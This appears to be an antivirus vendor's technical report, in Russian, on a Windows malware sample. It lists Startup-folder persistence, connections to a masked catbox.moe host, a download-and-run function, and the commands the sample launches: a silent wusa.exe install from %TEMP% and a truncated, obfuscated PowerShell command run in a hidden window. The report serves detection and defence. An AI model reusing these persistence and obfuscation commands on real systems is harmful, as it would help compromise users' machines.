Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
- %APPDATA%\microsoft\windows\start menu\programs\startup\<Имя файла>.js
Вредоносные функции
Загружает файлы и запускает на исполнение.
Сетевая активность
Подключается к
- 'fi###.catbox.moe':443
TCP
Другие
- 'fi###.catbox.moe':443
UDP
- DNS ASK fi###.catbox.moe
Другое
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' wusa.exe %TEMP%\\Upwin.msu /quiet /norestart
- '<SYSTEM32>\wusa.exe' %TEMP%\\Upwin.msu /quiet /norestart
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "sleep 180"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command $yuweU = 'JA' + [char]66 + 'MAFQAaw' + [char]66 + 'aAFoAIAA9ACAAJA' + [char]66 + 'oAG8Acw' + [char]66 + '0AC4AVg' + [char]66 + 'lAHIAcw' + [char]66 + 'pAG8AbgAuAE0AYQ' + [char]66 + 'qA... (со скрытым окном)
